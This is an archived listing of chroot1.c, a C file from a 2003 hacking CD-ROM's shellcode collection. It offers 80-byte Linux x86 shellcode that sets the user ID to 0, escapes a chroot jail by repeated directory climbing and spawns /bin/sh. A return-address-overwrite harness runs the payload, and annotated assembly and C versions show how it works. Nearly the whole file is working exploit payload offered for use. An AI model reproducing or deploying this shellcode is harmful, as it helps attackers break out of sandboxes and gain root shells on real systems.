home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hack.co.za / shellcode / linux-x86 / chroot1.c < prev    next >
Encoding:
C/C++ Source or Header  |  2001-01-12  |  3.2 KB  |  72 lines
  1. /* This is Linux chroot()/execve() code.It is 80 bytes long.I have some    *
  2.  * ideas how to make it smaller, but till then use this one.               *
  3.  *                                         signed predator                 *
  4.  *                                         linux registered user : 181116  *
  5.  *                                         preedator(at)sendmail(dot)ru    *
  6.  ***************************************************************************/
  7.  
  8. char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a"
  9.           "\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83"
  10.           "\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31"
  11.           "\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b"
  12.           "\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..";
  13.  
  14. int main(){
  15.   int *ret=(int *)(&ret+2);
  16.   printf("len : %d\n",strlen(sc));
  17.   *ret=(int)sc;
  18. }
  19.  
  20.  
  21. // Asm code
  22. /*********************************************
  23.  *int main(){                                *
  24.  * __asm__(" xorl %eax,%eax           \n"    *
  25.  *       " xorl %ebx,%ebx           \n"    *
  26.  *         " xorl %ecx,%ecx           \n"    *
  27.  *       " movb $0x17,%al           \n"    *
  28.  *       " int  $0x80               \n"    *
  29.  *         " jmp 0x36                 \n"    *
  30.  *         " popl %esi                \n"    *
  31.  *       " movb %al,0xa(%esi)       \n"    *
  32.  *         " leal 0x5(%esi),%ebx      \n"    *
  33.  *       " movb $0xed,%cl           \n"    *
  34.  *       " movb $0x27,%al           \n"    *
  35.  *       " int $0x80                \n"    *
  36.  *         " xorl %eax,%eax           \n"    *
  37.  *         " movb $0x3d,%al           \n"    *
  38.  *       " int $0x80                \n"    * 
  39.  *       " addl $0x2,%ebx           \n"    *
  40.  *         " movb $0xc,%al            \n"    *
  41.  *       " int $0x80                \n"    *
  42.  *         " loopne -0x06             \n"    *
  43.  *         " movb $0x3d,%al           \n"    *
  44.  *       " int $0x80                \n"    *
  45.  *       " movl %esi,0x8(%esi)      \n"    * 
  46.  *         " xorl %eax,%eax           \n"    * 
  47.  *         " movb %al,0x7(%esi)       \n"    *
  48.  *         " movl %eax,0xc(%esi)      \n"    *
  49.  *         " movl %esi,%ebx           \n"    *
  50.  *         " leal 0x8(%esi),%ecx      \n"    *
  51.  *         " movl %eax,%edx           \n"    *
  52.  *         " movb $0xb,%al            \n"    *
  53.  *         " int $0x80                \n"    *
  54.  *         " call -0x3b               \n"    *
  55.  *         " .string \"/bin/sh..\"    \n");  *
  56.  *}                                          *
  57.  *********************************************/ 
  58.  
  59. //C code
  60. /**********************************************
  61. *int main(){                                  *
  62. *  char *sh[2]={"/bin/sh",NULL};              *
  63. *  int gg=0xed                                *
  64. *  mkdir("sh..",gg);                  *
  65. *  chroot("sh..");                  *
  66. *  while (gg!=0){                             *
  67. *     chdir("..");gg--;                       *
  68. *  }                                          *
  69. * chroot("..");                               *
  70. * execve(sh[0],sh,NULL);                      *
  71. *}                                            *
  72. ***********************************************/